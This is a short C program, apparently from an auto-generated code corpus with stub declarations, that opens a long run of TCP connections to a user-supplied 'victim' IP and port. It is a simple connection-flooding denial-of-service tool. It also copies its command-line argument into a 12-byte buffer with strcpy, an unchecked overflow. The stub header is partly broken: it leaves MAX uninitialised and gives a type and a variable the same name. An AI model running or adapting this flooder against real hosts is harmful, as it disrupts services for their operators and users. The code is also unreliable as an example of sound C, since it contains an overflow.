
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int victim ;
struct sockaddr_in {int sin_addr; int sin_port; int sin_family; } ;
struct in_addr {int dummy; } ;


 int AF_INET ;
 int MAX ;
 int PF_INET ;
 int SOCK_STREAM ;
 int atoi (char*) ;
 int connect (int ,struct sockaddr_in*,int) ;
 int exit (int) ;
 int * fds ;
 int htons (int) ;
 int inet_aton (char*,int *) ;
 int printf (char*,...) ;
 int socket (int ,int ,int ) ;
 int strcpy (char*,char*) ;

int main(int argc, char *argv[])
{
   int port,a;
   char host[12];
   struct sockaddr_in victim;
   struct in_addr inp;

   if (argc!=3)
   {
       printf("usage: %s <ip> <port>\n",argv[0]);
       exit(1);
   }

   port=atoi(argv[2]);
   strcpy(host,argv[1]);
   printf("ip=%s\n",host);

   for (a=1;a<=MAX;a++)
   {
       fds[a]=socket(PF_INET,SOCK_STREAM,0);
       victim.sin_family= AF_INET;
       victim.sin_port=htons(port);
       inet_aton(host,&victim.sin_addr);
       connect(fds[a],&victim,sizeof(victim));
   }

   printf("done!");

}
